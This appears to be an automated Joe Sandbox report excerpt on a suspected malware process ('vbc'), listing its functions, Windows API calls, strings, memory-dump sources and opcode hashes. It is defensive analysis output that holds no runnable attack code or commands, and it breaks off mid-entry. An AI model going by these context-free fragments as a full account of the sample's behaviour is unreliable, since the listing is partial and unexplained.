memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D

Strings

oLA, xrefs: 0041A03C, 0041A048

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLA
API String ID: 1279760036-3789366272
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 004082B3, Relevance: 1.6, APIs: 1, Instructions: 71
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 9a6df075b3a899bbcc8e66ea9f4f4b1dfdcf750ef061f88f866bd59aa0326e67
Instruction ID: 15bcf26793c5adb4b30de96ac94af9ddbe6e7cdc6d38737c83c8a5ad6bd04a3e
Opcode Fuzzy Hash: 9a6df075b3a899bbcc8e66ea9f4f4b1dfdcf750ef061f88f866bd59aa0326e67
Instruction Fuzzy Hash: 0F113B31940324BBD721A6A49C02FEE7368AF41B54F05006DFE04BB1C2E7B9A91583E9

Uniqueness

Uniqueness Score: -1.00%

Function 0041A231, Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 56050d8244913e3bb370970d1dbd85be66a8c23741eff3f4d1711a73f959f3de
Instruction ID: bad0358d1984c2e8f8fd26a54909ca9b9a107d454ad3037bbbf37e326c04f907
Opcode Fuzzy Hash: 56050d8244913e3bb370970d1dbd85be66a8c23741eff3f4d1711a73f959f3de
Instruction Fuzzy Hash: 9E1104B41052846FDB11EFB8CC91CDBBFA8EF41220B00898EF8D847202C635E965CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082E9, Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: e021297182014d911c4727aa76fd82cc414bc15ba45ee236aca104e310637bf7
Instruction ID: c11f41c2e629a8b0ca5c2bb86d734e15c96e32f6bf9f39254c705a1de3a96043
Opcode Fuzzy Hash: e021297182014d911c4727aa76fd82cc414bc15ba45ee236aca104e310637bf7
Instruction Fuzzy Hash: CF012831A803187BE720A6A49C03FFF762C6B40F54F04401DFF04BA2C2E6A9690643EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1B1, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 81e7f82f74da59e32287c8610a01331687c91399019749a179af90c6b8378f79
Instruction ID: 6abfda86bcbcaadf275e5732025c7802f3ad21e74311e4aa4e9a40d80b62961e
Opcode Fuzzy Hash: 81e7f82f74da59e32287c8610a01331687c91399019749a179af90c6b8378f79
Instruction Fuzzy Hash: 28F0E5B82042952BD710DF71D844ED33FA9DF41360F14459EF8991B143C034A45ACBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A093, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 1fc7d20f58702dfe1a6385b027fd4cb1ef8faf4408b6f8ab23ddb250741d824d
Instruction ID: 6ec1928867d70db06631118dd6a6670a4e80df2ae2211c676bcc51d2afbf419b
Opcode Fuzzy Hash: 1fc7d20f58702dfe1a6385b027fd4cb1ef8faf4408b6f8ab23ddb250741d824d
Instruction Fuzzy Hash: 27E08C753022046BD620EF54CDC9EC777689F09360F128899BA586F241D234EA00C7A1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A526F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: 802df7f3fcaafa8157d67aff97ad1a6b93b4f3b5b251eee5c2f3a53fe4d7c84f
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: E1F0C2317241599BDB48EB189D91B6A33E5FB9A302F64C039ED49CB241E631ED448390

Uniqueness

Uniqueness Score: -1.00%

Function 00407AFA, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1669e11ad3f2db42f4edb2d1b6af7db5eb305ab2e62030786c1ba521431501a
Instruction ID: 55eabb77780294906751bcd01b9747c7c601a56198358abbad2850f632ef602e
Opcode Fuzzy Hash: f1669e11ad3f2db42f4edb2d1b6af7db5eb305ab2e62030786c1ba521431501a
Instruction Fuzzy Hash: F6D01233B5817509D9369D6CE8946B4FBB5DB83624F0013ABDC84B72918957B05241C9

Uniqueness

Uniqueness Score: -1.00%

Function 00417D59, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507081132.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be7af3753b33950736067c3ba3dab4c3a1ac96de5145e04d7940ba504d0c7c6f
Instruction ID: 9801893d2f5d77c543fc2294b50c0aebf5bb5c1a5ce7f1126ec7bee5f6fadfab
Opcode Fuzzy Hash: be7af3753b33950736067c3ba3dab4c3a1ac96de5145e04d7940ba504d0c7c6f
Instruction Fuzzy Hash: A0D0C775B091018AC301AF5954415B1FB75E747161704229AF959D7651D321845287E9

Uniqueness

Uniqueness Score: -1.00%

Function 00A3F8CC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697

Uniqueness

Uniqueness Score: -1.00%

Function 00A410D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 00A40060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 00A401D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96

Uniqueness

Uniqueness Score: -1.00%

Function 00A4010C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846

Uniqueness

Uniqueness Score: -1.00%

Function 00A41148, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A

Uniqueness

Uniqueness Score: -1.00%

Function 00A407AC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 00A68788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON

Download Yara Rule

APIs

_wcspbrk.LIBCMT ref: 00A68891
_wcspbrk.LIBCMT ref: 00A68979
_wcspbrk.LIBCMT ref: 00A68A61
_wcspbrk.LIBCMT ref: 00A68A9B
_wcspbrk.LIBCMT ref: 00AB1B9C

Strings

WindowsExcludedProcs, xrefs: 00A687C1
Kernel-MUI-Language-SKU, xrefs: 00A689FC
Kernel-MUI-Language-Allowed, xrefs: 00A68827
Kernel-MUI-Language-Disallowed, xrefs: 00A68914
Kernel-MUI-Number-Allowed, xrefs: 00A687E6

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
Instruction ID: 5ab7665fc7cde54beed12ebbd0d115cb4ab6791bda4bcc5c262023b1d487ed70
Opcode Fuzzy Hash: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
Instruction Fuzzy Hash: 11F1F5B6D00209EFCF11DFA4CA859EEBBB8FF08300F14456AE505A7211EB359E45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00A8146B
___swprintf_l.LIBCMT ref: 00A81490
___swprintf_l.LIBCMT ref: 00AAE970

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 00AAE9B0
ffff:, xrefs: 00AAE94B
:%u.%u.%u.%u, xrefs: 00AAE9F4
::%hs%u.%u.%u.%u, xrefs: 00AAE967

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
Instruction ID: 9bb5ff0cbf4bea62b3719ec61a768380f95b12e9dd7b2d19e37c31db67ad464c
Opcode Fuzzy Hash: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
Instruction Fuzzy Hash: 4A6127B5D00755AACB24EF59C8808BFBBB9EFD5300B54C52DF4DA4B581D334AA41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A80554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA2206

Strings

RTL: Resource at %p, xrefs: 00AA221D, 00AA230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00AA220E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AA22FC
RTL: Re-Waiting, xrefs: 00AA223A, 00AA2328

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507996526.0000000000B24000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508023829.0000000000B27000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508086796.0000000000B30000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.508145129.0000000000B90000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_vbc.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
Instruction ID: 7662a3023d0ac1f1c6d74e8822ec220e7cd4a0393b1a915961b4bed8a8587431
Opcode Fuzzy Hash: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
Instruction Fuzzy Hash: 52513935B002116FEF199B18CC81FA673A9AFD9710F218229FD55DF2C6DA31EC5587A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 00AAEA22

Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A8146B
Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A81490

___swprintf_l.LIBCMT ref: 00A8156D

Strings

]:%u, xrefs: 00AAEA47
%%%u, xrefs: 00A81564

Memory Dump Source

Source File: 00000005.00000002.507308179.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000005.00000002.507296853.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507950798.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.507972739.0000000000B20000.00000040.00000001.sdmp Download File
